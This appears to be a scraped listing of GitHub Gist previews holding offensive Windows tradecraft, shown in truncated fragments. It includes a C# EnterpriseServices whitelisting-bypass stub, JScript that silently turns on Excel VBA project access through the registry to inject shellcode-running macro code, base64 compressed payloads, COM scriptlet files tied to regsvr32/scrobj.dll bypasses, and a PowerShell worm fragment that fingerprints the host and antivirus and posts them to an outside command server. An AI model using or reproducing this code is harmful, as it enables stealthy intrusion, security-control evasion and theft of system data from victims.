This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.EnterpriseServices; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause | |
Create Your Strong Name Key -> key.snk | |
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var objExcel = new ActiveXObject("Excel.Application"); | |
objExcel.Visible = false; | |
var WshShell = new ActiveXObject("WScript.Shell"); | |
var Application_Version = objExcel.Version;//Auto-Detect Version | |
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
var objWorkbook = objExcel.Workbooks.Add(); | |
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1); | |
// Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/ | |
var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$EncodedCompressedFile = @';; | |
7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivvipP+nX+LV/jV/j1/h16P//9//9a/waf9evIc/vqT83PX8Q/f83+V3+nt/k1/jbfuyf/13/rl/z+T//u76ZF026qquLOluk02y5rNp0kqf1epkWy/Tpl6/TRTXLx7/xb5z8bgrj5emv8Ws8/zV/7V/jt/9f/53f28D9j36NX+vX/A1/zd/w1/g1fiv64zeTz/6CPfon/TUUsd9Tfv+1BG885uev8QfJ53/ob/hr0o/f8w9nAAzD/LQ/+HlKcL+LX35PAvkbeV/8Qvr/b0r//wN+jV8DH/9Gu7/Gr/E7eV/f+KS/xq/xG3h//gb097e9v8dt/q6ln3/ZbyFteay/ltdAPv4DxnVTT38Nxe33pP//JvT/3yZsRx//nuM6L6up4AqcGZYhsmv3JPyEyLUnP7/9a+CVX/fX+Ic+ovmgPn7NX4P//+v9Bh85nrjN8zvu/Dq/xn/9a/C7v/mv8WvU9GPV/Ga/xq+RJL9eRX8nv8av8R/8ukTZ/+DX+DW2aODJb/i7/BZ//G9LjX+j3+C3qR9S07/kN/htt35L+vwv+Q1+O/3529ff589/B/37d6z/Uf77d9K/f+f6d/818fcv0L9/lx8zvyT1lL/5XX7DX78i4ia/8W/xa2/91vLVb2Ta/Mb1L5E2v8mvX/028tFvar77zeo/W777zX/9inBMqt+OP9/67elH/ffTV7/N7/J7bv0O9Mcv/BbG+5th9L/mr/Hb/La/xq9Lg/41v/Vrbf0CHu+v8a1f47fc+bV+jce/Bk/Jb/5r/FL69tf5rf6vX/O3+b9o1Nsf/Rr1f0ig/iUSwV9r63dBLyn90/yuTLE/CE3lhd/wk1/j1//Wb7nza/4aJBWQV4 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Bandit" | |
progid="Bandit" | |
version="1.00" | |
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
remotable="true" | |
> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Bandit" | |
progid="Bandit" | |
version="1.00" | |
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
remotable="true" | |
> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$spl = '\';$vn = 'Guest';function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;$HWD = $HWD[0];$wi = (Get-WmiObject Win32_OperatingSystem).Caption;$wi = $wi + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');$av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;$e = $env:windir + '\Microsoft.NET\Framework\v2.0.50727\vbc.exe';if (test-path $e) {$nt = 'YES'} else {$nt= 'NO'}; if (test-path 'HKCU:\vdw0rm') {$usb = 'TRUE'} else { $usb = 'FALSE'};$u = $vn + '_' + $HWD + $spl + $mch + $spl + $usr + $spl + $wi + $spl + $av + $spl + $spl + $nt + $spl + $usb + $spl;return $u} catch {Start-Sleep -s 3}};function post ($cmdv, $v) { try { $enc = [system.Text.Encoding]::UTF8;$Req = [System.Net.HttpWebRequest]::Create('http://elmod.zapto.org:1199/' + $cmdv);$Req.Method = 'POST';$req.UserAgent = info;[System.IO.Stream]$stm;$stm = $Req |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="PoC" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - Casey Smith @subTee --> | |
<!-- License: BSD3-Clause --> | |
<script language="JScript"> | |
<![CDATA[ | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$EncodedCompressedFile = @' | |
7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivvipP+nX+LV/jV/j1/h16P//9//9a/waf9evIc/vqT83PX8Q/f83+V3+nt/k1/jbfuyf/13/rl/z+T//u76ZF026qquLOluk02y5rNp0kqf1epkWy/Tpl6/TRTXLx7/xb5z8bgrj5emv8Ws8/zV/7V/jt/9f/53f28D9j36NX+vX/A1/zd/w1/g1fiv64zeTz/6CPfon/TUUsd9Tfv+1BG885uev8QfJ53/ob/hr0o/f8w9nAAzD/LQ/+HlKcL+LX35PAvkbeV/8Qvr/b0r//wN+jV8DH/9Gu7/Gr/E7eV/f+KS/xq/xG3h//gb097e9v8dt/q6ln3/ZbyFteay/ltdAPv4DxnVTT38Nxe33pP//JvT/3yZsRx//nuM6L6up4AqcGZYhsmv3JPyEyLUnP7/9a+CVX/fX+Ic+ovmgPn7NX4P//+v9Bh85nrjN8zvu/Dq/xn/9a/C7v/mv8WvU9GPV/Ga/xq+RJL9eRX8nv8av8R/8ukTZ/+DX+DW2aODJb/i7/BZ//G9LjX+j3+C3qR9S07/kN/htt35L+vwv+Q1+O/3529ff589/B/37d6z/Uf77d9K/f+f6d/818fcv0L9/lx8zvyT1lL/5XX7DX78i4ia/8W/xa2/91vLVb2Ta/Mb1L5E2v8mvX/028tFvar77zeo/W777zX/9inBMqt+OP9/67elH/ffTV7/N7/J7bv0O9Mcv/BbG+5th9L/mr/Hb/La/xq9Lg/41v/Vrbf0CHu+v8a1f47fc+bV+jce/Bk/Jb/5r/FL69tf5rf6vX/O3+b9o1Nsf/Rr1f0ig/iUSwV9r63dBLyn90/yuTLE/CE3lhd/wk1/j1//Wb7nza/4aJBWQV4ID |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Empire" | |
progid="Empire" | |
version="1.00" | |
classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
> | |
<!-- regsvr32 /s /i"C:\Bypass\STC_MsgBox.sct" scrobj.dll --> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Bandit" | |
progid="Bandit" | |
version="1.00" | |
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
remotable="true" | |
> |
OlderNewer